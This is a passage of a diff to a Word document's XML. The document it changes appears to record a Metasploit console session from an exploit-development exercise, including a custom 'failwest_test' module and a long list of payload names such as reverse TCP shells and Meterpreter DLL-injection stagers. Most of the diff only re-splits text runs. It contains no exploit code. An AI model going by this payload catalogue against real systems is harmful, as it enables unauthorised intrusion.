         <w:t>yMMMMMMMMMM</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:t>$$MMMMMN&amp;&amp;</w:t>
       </w:r>
@@ -2217,13 +2480,18 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t>:  ``                 .</w:t>
+        <w:t xml:space="preserve">:  ``               </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t xml:space="preserve">  .</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:t>sNd</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:t xml:space="preserve">  :MMMMMMMMMM$$MMMMMN&amp;&amp;</w:t>
       </w:r>
@@ -2238,13 +2506,18 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">      .</w:t>
+        <w:t xml:space="preserve">      </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>.</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:t>yNmMMh</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:t>//+</w:t>
       </w:r>
@@ -2272,13 +2545,18 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">    .</w:t>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>.</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:t>shMMMMN</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:t>//</w:t>
       </w:r>
@@ -2318,7 +2596,11 @@
     <w:p>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">    `///</w:t>
+        <w:t xml:space="preserve">    `/</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>//</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -2334,7 +2616,11 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t>/:::::/+</w:t>
+        <w:t>/::::</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>:/+</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -2387,9 +2673,14 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t>.     `/++-.-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>.     `/++</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>-.-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:t>yy</w:t>
       </w:r>
@@ -2431,6 +2722,7 @@
         <w:t>hMMmssddd</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:t>+:</w:t>
       </w:r>
@@ -2439,8 +2731,17 @@
         <w:t>dMMmNMMh</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>.     `.-=</w:t>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">.     </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>`.-</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>=</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -2453,13 +2754,18 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">          .</w:t>
+        <w:t xml:space="preserve">          </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>.</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:t>sMMmo</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:t>.    -</w:t>
       </w:r>
@@ -2468,6 +2774,7 @@
         <w:t>dMd</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:t>--:</w:t>
       </w:r>
@@ -2476,13 +2783,22 @@
         <w:t>mN</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:t>/`           ||--X--||          ||--X--||</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
-        <w:t>........../yddy/:...+hmo-...hdd:............\\=v=//............\\=v=//.........</w:t>
+        <w:t>........../yddy</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>/:...</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>+hmo-...hdd:............\\=v=//............\\=v=//.........</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2582,7 +2898,15 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">       =[ </w:t>
+        <w:t xml:space="preserve">       </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>=[</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -2595,12 +2919,28 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>+ -- --=[ 1468 exploits - 840 auxiliary - 232 post        ]</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">+ -- --=[ 432 payloads - 37 encoders - 8 </w:t>
+        <w:t>+ -- --</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>=[</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> 1468 exploits - 840 auxiliary - 232 post        ]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>+ -- --</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>=[</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> 432 payloads - 37 encoders - 8 </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -2613,7 +2953,15 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">+ -- --=[ Free </w:t>
+        <w:t>+ -- --</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>=[</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Free </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -2655,7 +3003,15 @@
     <w:p>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">   Name                   Disclosure Date  Rank    Description</w:t>
+        <w:t xml:space="preserve">   Name                   Disclosure </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>Date  Rank</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">    Description</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2673,11 +3029,19 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve">/test                   normal  </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>failwest_test</w:t>
+        <w:t xml:space="preserve">/test                   </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t xml:space="preserve">normal  </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>failwest</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>_test</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
     </w:p>
@@ -2728,7 +3092,15 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">   Name   Current Setting  Required  Description</w:t>
+        <w:t xml:space="preserve">   Name   Current </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>Setting  Required</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">  Description</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2828,7 +3200,15 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">   Name                                             Disclosure Date  Rank    Description</w:t>
+        <w:t xml:space="preserve">   Name                                             Disclosure </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>Date  Rank</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">    Description</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2838,7 +3218,15 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">   generic/custom                                                    normal  Custom Payload</w:t>
+        <w:t xml:space="preserve">   generic/custom                                                    </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>normal  Custom</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Payload</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2851,7 +3239,15 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve">                                                normal  Generic x86 Debug Trap</w:t>
+        <w:t xml:space="preserve">                                                </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>normal  Generic</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> x86 Debug Trap</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2864,7 +3260,15 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve">                                            normal  Generic Command Shell, Bind TCP Inline</w:t>
+        <w:t xml:space="preserve">                                            </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>normal  Generic</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Command Shell, Bind TCP Inline</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2877,7 +3281,15 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve">                                         normal  Generic Command Shell, Reverse TCP Inline</w:t>
+        <w:t xml:space="preserve">                                         </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>normal  Generic</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Command Shell, Reverse TCP Inline</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2890,7 +3302,15 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve">                                                normal  Generic x86 Tight Loop</w:t>
+        <w:t xml:space="preserve">                                                </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>normal  Generic</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> x86 Tight Loop</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2903,7 +3323,15 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t>/bind_ipv6_tcp                                   normal  Reflective DLL Injection, Bind IPv6 TCP Stager (Windows x86)</w:t>
+        <w:t xml:space="preserve">/bind_ipv6_tcp                                   </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>normal  Reflective</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> DLL Injection, Bind IPv6 TCP Stager (Windows x86)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2924,7 +3352,15 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve">                                   normal  Reflective DLL Injection, Bind TCP Stager (No NX or Win7)</w:t>
+        <w:t xml:space="preserve">                                   </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>normal  Reflective</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> DLL Injection, Bind TCP Stager (No NX or Win7)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2945,11 +3381,19 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve">                                        normal  </w:t>
+        <w:t xml:space="preserve">                                        </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t xml:space="preserve">normal  </w:t>
       </w:r>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t>Reflective DLL Injection, Bind TCP Stager (Windows x86)</w:t>
+        <w:t>Reflective</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> DLL Injection, Bind TCP Stager (Windows x86)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2962,7 +3406,15 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t>/reverse_ipv6_tcp                                normal  Reflective DLL Injection, Reverse TCP Stager (IPv6)</w:t>
+        <w:t xml:space="preserve">/reverse_ipv6_tcp                                </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>normal  Reflective</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> DLL Injection, Reverse TCP Stager (IPv6)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2983,7 +3435,15 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve">                                normal  Reflective DLL Injection, Reverse TCP Stager (No NX or Win7)</w:t>
+        <w:t xml:space="preserve">                                </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>normal  Reflective</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> DLL Injection, Reverse TCP Stager (No NX or Win7)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3004,7 +3464,15 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve">                                 normal  Reflective DLL Injection, Reverse Ordinal TCP Stager (No NX or Win7)</w:t>
+        <w:t xml:space="preserve">                                 </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>normal  Reflective</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> DLL Injection, Reverse Ordinal TCP Stager (No NX or Win7)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3025,7 +3493,15 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve">                                     normal  Reflective DLL Injection, Reverse TCP Stager</w:t>
+        <w:t xml:space="preserve">                                     </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>normal  Reflective</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> DLL Injection, Reverse TCP Stager</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3046,7 +3522,15 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve">                            normal  Reflective DLL Injection, Reverse All-Port TCP Stager</w:t>
+        <w:t xml:space="preserve">                            </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>normal  Reflective</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> DLL Injection, Reverse All-Port TCP Stager</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3059,12 +3543,28 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve">                                        normal  DNS TXT Record Payload Download and Execution</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">   windows/exec                                                      normal  Windows Execute Command</w:t>
+        <w:t xml:space="preserve">                                        </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>normal  DNS</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> TXT Record Payload Download and Execution</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">   windows/exec                                                      </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>normal  Windows</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Execute Command</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3077,7 +3577,15 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve">                                               normal  Windows </w:t>
+        <w:t xml:space="preserve">                                               </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>normal  Windows</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -3098,7 +3606,15 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve">                                                normal  Windows </w:t>
+        <w:t xml:space="preserve">                                                </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>normal  Windows</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -3116,7 +3632,15 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t>/bind_ipv6_tcp                                 normal  Windows Meterpreter (Reflective Injection), Bind IPv6 TCP Stager (Windows x86)</w:t>
+        <w:t xml:space="preserve">/bind_ipv6_tcp                                 </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>normal  Windows</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Meterpreter (Reflective Injection), Bind IPv6 TCP Stager (Windows x86)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3137,7 +3661,15 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve">                                 normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager (No NX or Win7)</w:t>
+        <w:t xml:space="preserve">                                 </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>normal  Windows</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Meterpreter (Reflective Injection), Bind TCP Stager (No NX or Win7)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3158,7 +3690,15 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve">                                      normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager (Windows x86)</w:t>
+        <w:t xml:space="preserve">                                      </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>normal  Windows</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Meterpreter (Reflective Injection), Bind TCP Stager (Windows x86)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3171,7 +3711,15 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t>/reverse_ipv6_tcp                              normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (IPv6)</w:t>
+        <w:t xml:space="preserve">/reverse_ipv6_tcp                              </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>normal  Windows</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Meterpreter (Reflective Injection), Reverse TCP Stager (IPv6)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3192,7 +3740,15 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve">                              normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (No NX or Win7)</w:t>
+        <w:t xml:space="preserve">                              </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>normal  Windows</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Meterpreter (Reflective Injection), Reverse TCP Stager (No NX or Win7)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3213,7 +3769,15 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve">                               normal  Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)</w:t>
+        <w:t xml:space="preserve">                               </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>normal  Windows</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3234,7 +3798,15 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve">                                   normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager</w:t>
+        <w:t xml:space="preserve">                                   </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>normal  Windows</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Meterpreter (Reflective Injection), Reverse TCP Stager</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3255,7 +3827,15 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve">                          normal  Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager</w:t>
+        <w:t xml:space="preserve">                          </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>normal  Windows</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Meterpreter (Reflective Injection), Reverse All-Port TCP Stager</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3268,7 +3848,15 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve">                                           normal  Windows Meterpreter Service, Bind TCP</w:t>
+        <w:t xml:space="preserve">                                           </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>normal  Windows</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Meterpreter Service, Bind TCP</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3281,7 +3869,15 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve">                                        normal  Windows Meterpreter Service, Reverse TCP Inline</w:t>
+        <w:t xml:space="preserve">                                        </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>normal  Windows</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Meterpreter Service, Reverse TCP Inline</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3294,7 +3890,15 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t>/bind_ipv6_tcp                            normal  Windows Inject DLL, Bind IPv6 TCP Stager (Windows x86)</w:t>
+        <w:t xml:space="preserve">/bind_ipv6_tcp                            </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>normal  Windows</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Inject DLL, Bind IPv6 TCP Stager (Windows x86)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3315,7 +3919,15 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve">                            normal  Windows Inject DLL, Bind TCP Stager (No NX or Win7)</w:t>
+        <w:t xml:space="preserve">                            </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>normal  Windows</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Inject DLL, Bind TCP Stager (No NX or Win7)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3336,11 +3948,19 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve">                                 normal  </w:t>
+        <w:t xml:space="preserve">                                 </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t xml:space="preserve">normal  </w:t>
       </w:r>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t>Windows Inject DLL, Bind TCP Stager (Windows x86)</w:t>
+        <w:t>Windows</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Inject DLL, Bind TCP Stager (Windows x86)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3353,7 +3973,15 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t>/reverse_ipv6_tcp                         normal  Windows Inject DLL, Reverse TCP Stager (IPv6)</w:t>
+        <w:t xml:space="preserve">/reverse_ipv6_tcp                         </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>normal  Windows</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Inject DLL, Reverse TCP Stager (IPv6)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3374,7 +4002,15 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve">                         normal  Windows Inject DLL, Reverse TCP Stager (No NX or Win7)</w:t>
+        <w:t xml:space="preserve">                         </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>normal  Windows</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Inject DLL, Reverse TCP Stager (No NX or Win7)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3395,7 +4031,15 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve">                          normal  Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7)</w:t>
+        <w:t xml:space="preserve">                          </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>normal  Windows</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3416,7 +4060,15 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve">                              normal  Windows Inject DLL, Reverse TCP Stager</w:t>
+        <w:t xml:space="preserve">                              </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>normal  Windows</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Inject DLL, Reverse TCP Stager</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3437,7 +4089,15 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve">                     normal  Windows Inject DLL, Reverse All-Port TCP Stager</w:t>
+        <w:t xml:space="preserve">                     </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
